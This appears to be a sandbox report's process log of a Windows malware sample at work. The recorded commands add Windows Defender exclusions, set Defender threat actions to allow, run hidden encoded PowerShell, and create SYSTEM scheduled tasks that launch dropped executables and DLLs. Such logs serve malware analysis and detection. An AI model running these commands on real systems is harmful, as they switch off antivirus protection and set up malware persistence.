C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:643⤵PID:16876
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:323⤵PID:16940
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:643⤵PID:11480
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:323⤵PID:4796
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:643⤵PID:16416
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:323⤵PID:15372
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:643⤵PID:2752
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pJxacTbbSlizmPVB /t REG_DWORD /d 0 /reg:323⤵PID:17668
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pJxacTbbSlizmPVB /t REG_DWORD /d 0 /reg:643⤵PID:17048
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE /t REG_DWORD /d 0 /reg:323⤵PID:2844
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE /t REG_DWORD /d 0 /reg:643⤵PID:18016
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj /t REG_DWORD /d 0 /reg:323⤵PID:17212
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj /t REG_DWORD /d 0 /reg:643⤵PID:2904
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZKIEJJPSRIlthXTT /t REG_DWORD /d 0 /reg:323⤵PID:18180
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZKIEJJPSRIlthXTT /t REG_DWORD /d 0 /reg:643⤵PID:4052
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjWTrsHzW" /SC once /ST 11:38:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵PID:17204
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjWTrsHzW"2⤵PID:2408
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjWTrsHzW"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:6884 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 11:14:14 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\QnsdELv.exe\" V8 /site_id 754 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:9524 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cbBtQoNpOByPPTwrn"2⤵PID:9252
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:321⤵PID:12964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:11020
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:14296
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:13852
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3f41⤵PID:16156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:14544
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:18060
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7912
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8376
-
C:\Users\Admin\AppData\Local\Temp\291A.tmp.exeC:\Users\Admin\AppData\Local\Temp\291A.tmp.exe1⤵PID:8772
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9536
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:16452
-
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\QnsdELv.exeC:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\QnsdELv.exe V8 /site_id 754 /S1⤵PID:9176
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"2⤵PID:8844
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:10372
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:9196
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:11496
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:12312
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\OIEdde.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F2⤵
- Creates scheduled task(s)
PID:10344 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\cHanQIu.xml" /RU "SYSTEM"2⤵PID:12704
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qTJPyBJZsADsDDd"2⤵PID:424
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qTJPyBJZsADsDDd"2⤵PID:12236
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\WdIIjlr.xml" /RU "SYSTEM"2⤵PID:16044
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\kCqFsmG.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:17524 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\zXrIAnb.xml" /RU "SYSTEM"2⤵PID:6180
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\TCSqKvA.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5752 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hMZOFgVuABkGdcuhk" /SC once /ST 02:42:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\BEgcWAHJ\EfEPEkl.dll\",#1 /site_id 754" /V1 /F2⤵PID:8804
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hMZOFgVuABkGdcuhk"2⤵PID:7768
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuHADrpYFos" /SC once /ST 08:43:08 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\bhYCpPsR\lFmLdjC.exe\" U4 /S"2⤵
- Creates scheduled task(s)
PID:8152 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuHADrpYFos"2⤵PID:11492
-
C:\Users\Admin\AppData\Local\Temp\3EF5.tmp.exeC:\Users\Admin\AppData\Local\Temp\3EF5.tmp.exe1⤵PID:9568
-
C:\Users\Admin\AppData\Local\Temp\5491.tmp.exeC:\Users\Admin\AppData\Local\Temp\5491.tmp.exe1⤵PID:11408
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:11856
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:12116
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:12152
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:12744
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:13080
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:13268
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:13424
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:10968
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:12668
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\BEgcWAHJ\EfEPEkl.dll",#1 /site_id 7541⤵PID:11612
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\BEgcWAHJ\EfEPEkl.dll",#1 /site_id 7542⤵PID:11304
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hMZOFgVuABkGdcuhk"3⤵PID:11316
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\bhYCpPsR\lFmLdjC.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\bhYCpPsR\lFmLdjC.exe U4 /S1⤵PID:11568
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7484
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7484 -s 15082⤵
- Program crash
PID:17956
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11804
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 11804 -s 15842⤵
- Program crash
PID:11960
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:12720
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:11684
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:10760
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\QJpEgYx.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\QJpEgYx.exe nh /site_id 754 /S1⤵PID:5656
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"2⤵PID:10712
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:10312
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:10160
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:9560
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:12944
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:11380
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:12336
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:8940
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:11960
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:11580
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:13396
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:6080
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:9652
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3908
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5416
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:13348
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2176
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4080
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:13332
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:14076
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:13120
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:14168
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 11:50:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\wqDdfql.exe\" V8 /site_id 754 /S" /V1 /F2⤵PID:8952
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cbBtQoNpOByPPTwrn"2⤵PID:11052
-
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\wqDdfql.exeC:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\wqDdfql.exe V8 /site_id 754 /S1⤵PID:17232
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"2⤵PID:10236
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:5076
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:12980
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:12292
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:5048
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\CVoCVk.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F2⤵
- Creates scheduled task(s)
PID:8724 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\PyOtCFV.xml" /RU "SYSTEM"2⤵PID:7596
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qTJPyBJZsADsDDd"2⤵PID:7956
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qTJPyBJZsADsDDd"2⤵PID:16480
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\UAuWqEq.xml" /RU "SYSTEM"2⤵PID:11224
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\MgSeQII.xml" /RU "SYSTEM"2⤵PID:6252
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\lSJSfEB.xml" /RU "SYSTEM"2⤵PID:17264
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\eXMZLwU.xml" /RU "SYSTEM"2⤵PID:4496
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuTfnIhpswj" /SC once /ST 04:55:24 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\YtbQHALJ\vGqDmFU.exe\" U4 /S"2⤵
- Creates scheduled task(s)
PID:1260 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuTfnIhpswj"2⤵PID:12060
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\YtbQHALJ\vGqDmFU.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\YtbQHALJ\vGqDmFU.exe U4 /S1⤵PID:8760
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:16780
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7488
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8448
-
